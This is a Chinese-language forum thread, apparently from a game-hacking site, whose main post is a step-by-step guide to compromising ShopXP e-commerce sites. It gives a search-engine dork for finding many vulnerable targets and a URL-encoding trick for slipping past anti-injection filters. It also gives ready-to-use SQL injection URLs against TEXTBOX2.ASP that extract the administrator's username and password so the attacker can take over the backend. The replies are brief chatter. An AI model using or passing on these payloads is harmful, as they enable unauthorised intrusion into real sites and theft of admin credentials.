WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2784查看
  • 2回复

主题

好友

1700

积分

禁止访问

发表于 2010-1-20 16:28:16 |显示全部楼层
1.搜索漏洞关键词,寻找目标网站

2.打开页面TEXTBOX2.ASP?action=modify&newsid=ID号

3.查看是否存在注射,做了防注射

4.转码绕过防注射,进行联合查询

5.获取管理员账号密码登陆后台

批量关键词:
inurl:shopxp_news.asp

漏洞利用代码:
TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin,4,5,6,7%20from%20shopxp_admin

TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,password,4,5,6,7%20from%20shopxp_admin

主题

好友

92

积分

注册会员

发表于 2012-1-15 17:57:59 |显示全部楼层
玩传奇的加我啊
回复

使用道具 举报

主题

好友

272

积分

中级会员

发表于 2012-1-22 02:47:59 |显示全部楼层
转码绕过防注射,进行联合查询
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-28 02:13 , Processed in 0.052358 second(s), 16 queries .

返回顶部